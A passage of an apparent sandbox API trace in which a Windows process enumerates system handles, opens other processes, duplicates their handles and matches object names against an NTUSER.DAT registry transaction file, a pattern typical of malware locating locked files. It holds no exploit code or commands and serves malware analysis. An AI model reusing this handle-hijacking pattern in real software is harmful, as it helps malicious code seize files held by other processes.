ResultLength=0x32ee30 | out: SystemInformation=0x3210048, ResultLength=0x32ee30*=0x274c4) returned 0x0 [0163.869] GetCurrentProcessId () returned 0xb58 [0163.869] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0163.869] CloseHandle (hObject=0x1e8) returned 1 [0163.869] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x400) returned 0x208e38 [0163.869] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x208e38, Length=0x400, ResultLength=0x32ee70 | out: SystemInformation=0x208e38, ResultLength=0x32ee70*=0x274b4) returned 0xc0000004 [0163.870] RtlReAllocateHeap (Heap=0x130000, Flags=0x0, Ptr=0x208e38, Size=0x274b4) returned 0x3210048 [0163.870] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x3210048, Length=0x274b4, ResultLength=0x32ee70 | out: SystemInformation=0x3210048, ResultLength=0x32ee70*=0x274b4) returned 0x0 [0163.873] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x10000) returned 0x210e20 [0163.873] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.873] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.876] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.876] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.877] CloseHandle (hObject=0x1e4) returned 1 [0163.877] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0163.877] CloseHandle (hObject=0x194) returned 1 [0163.877] CloseHandle (hObject=0x1e8) returned 1 [0163.877] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.877] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.877] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.878] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.878] CloseHandle (hObject=0x1e4) returned 1 [0163.878] CloseHandle (hObject=0x194) returned 1 [0163.878] CloseHandle (hObject=0x1e8) returned 1 [0163.878] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.879] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.879] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.880] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.880] CloseHandle (hObject=0x1e4) returned 1 [0163.880] CloseHandle (hObject=0x194) returned 1 [0163.880] CloseHandle (hObject=0x1e8) returned 1 [0163.880] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.880] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.881] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.882] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.882] CloseHandle (hObject=0x1e4) returned 1 [0163.882] CloseHandle (hObject=0x194) returned 1 [0163.882] CloseHandle (hObject=0x1e8) returned 1 [0163.882] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.882] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.883] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.884] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.884] CloseHandle (hObject=0x1e4) returned 1 [0163.884] CloseHandle (hObject=0x194) returned 1 [0163.884] CloseHandle (hObject=0x1e8) returned 1 [0163.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.884] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.885] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.886] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.886] CloseHandle (hObject=0x1e4) returned 1 [0163.886] CloseHandle (hObject=0x194) returned 1 [0163.886] CloseHandle (hObject=0x1e8) returned 1 [0163.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.886] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.887] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.887] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.887] CloseHandle (hObject=0x1e4) returned 1 [0163.888] CloseHandle (hObject=0x194) returned 1 [0163.888] CloseHandle (hObject=0x1e8) returned 1 [0163.888] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.888] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.888] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.889] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.889] CloseHandle (hObject=0x1e4) returned 1 [0163.889] CloseHandle (hObject=0x194) returned 1 [0163.889] CloseHandle (hObject=0x1e8) returned 1 [0163.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8 [0163.890] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.890] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.891] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.891] CloseHandle (hObject=0x1e4) returned 1 [0163.891] CloseHandle (hObject=0x194) returned 1 [0163.891] CloseHandle (hObject=0x1e8) returned 1 [0163.891] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0163.891] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.891] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.892] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.893] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.893] CloseHandle (hObject=0x1e4) returned 1 [0163.893] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.893] CloseHandle (hObject=0x194) returned 1 [0163.893] CloseHandle (hObject=0x1e8) returned 1 [0163.893] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0163.893] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.894] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.894] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.894] CloseHandle (hObject=0x1e4) returned 1 [0163.894] CloseHandle (hObject=0x194) returned 1 [0163.895] CloseHandle (hObject=0x1e8) returned 1 [0163.895] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x1e8 [0163.895] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.896] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.896] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.897] CloseHandle (hObject=0x1e4) returned 1 [0163.897] _wcsicmp (_Str1="\\ntdll.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -17 [0163.897] CloseHandle (hObject=0x194) returned 1 [0163.897] CloseHandle (hObject=0x1e8) returned 1 [0163.897] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.897] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.899] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.901] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.901] CloseHandle (hObject=0x1e4) returned 1 [0163.901] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.901] CloseHandle (hObject=0x194) returned 1 [0163.902] CloseHandle (hObject=0x1e8) returned 1 [0163.902] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.902] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.903] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.903] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.903] CloseHandle (hObject=0x1e4) returned 1 [0163.904] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0163.904] CloseHandle (hObject=0x194) returned 1 [0163.904] CloseHandle (hObject=0x1e8) returned 1 [0163.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.904] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.904] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.905] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.905] CloseHandle (hObject=0x1e4) returned 1 [0163.905] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0163.905] CloseHandle (hObject=0x194) returned 1 [0163.905] CloseHandle (hObject=0x1e8) returned 1 [0163.905] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.906] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.906] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.907] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.907] CloseHandle (hObject=0x1e4) returned 1 [0163.907] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0163.907] CloseHandle (hObject=0x194) returned 1 [0163.907] CloseHandle (hObject=0x1e8) returned 1 [0163.907] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.907] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.908] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.909] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.909] CloseHandle (hObject=0x1e4) returned 1 [0163.909] CloseHandle (hObject=0x194) returned 1 [0163.909] CloseHandle (hObject=0x1e8) returned 1 [0163.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.909] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.910] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.911] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.911] CloseHandle (hObject=0x1e4) returned 1 [0163.911] CloseHandle (hObject=0x194) returned 1 [0163.911] CloseHandle (hObject=0x1e8) returned 1 [0163.911] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.911] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.912] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.912] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.913] CloseHandle (hObject=0x1e4) returned 1 [0163.913] CloseHandle (hObject=0x194) returned 1 [0163.913] CloseHandle (hObject=0x1e8) returned 1 [0163.913] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.913] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.914] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.914] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.915] CloseHandle (hObject=0x1e4) returned 1 [0163.915] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0163.915] CloseHandle (hObject=0x194) returned 1 [0163.915] CloseHandle (hObject=0x1e8) returned 1 [0163.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.915] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.915] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.916] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.916] CloseHandle (hObject=0x1e4) returned 1 [0163.916] CloseHandle (hObject=0x194) returned 1 [0163.916] CloseHandle (hObject=0x1e8) returned 1 [0163.916] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x1e8 [0163.916] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.917] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.918] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.918] CloseHandle (hObject=0x1e4) returned 1 [0163.918] CloseHandle (hObject=0x194) returned 1 [0163.918] CloseHandle (hObject=0x1e8) returned 1 [0163.918] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0163.918] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.919] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.920] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.920] CloseHandle (hObject=0x1e4) returned 1 [0163.920] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0163.920] CloseHandle (hObject=0x194) returned 1 [0163.920] CloseHandle (hObject=0x1e8) returned 1 [0163.920] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0163.920] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.921] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.922] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.922] CloseHandle (hObject=0x1e4) returned 1 [0163.922] CloseHandle (hObject=0x194) returned 1 [0163.922] CloseHandle (hObject=0x1e8) returned 1 [0163.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0163.922] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.923] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.924] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.924] CloseHandle (hObject=0x1e4) returned 1 [0163.924] CloseHandle (hObject=0x194) returned 1 [0163.924] CloseHandle (hObject=0x1e8) returned 1 [0163.924] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0163.924] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.925] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.926] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.926] CloseHandle (hObject=0x1e4) returned 1 [0163.926] CloseHandle (hObject=0x194) returned 1 [0163.926] CloseHandle (hObject=0x1e8) returned 1 [0163.926] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x1e8 [0163.926] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.927] 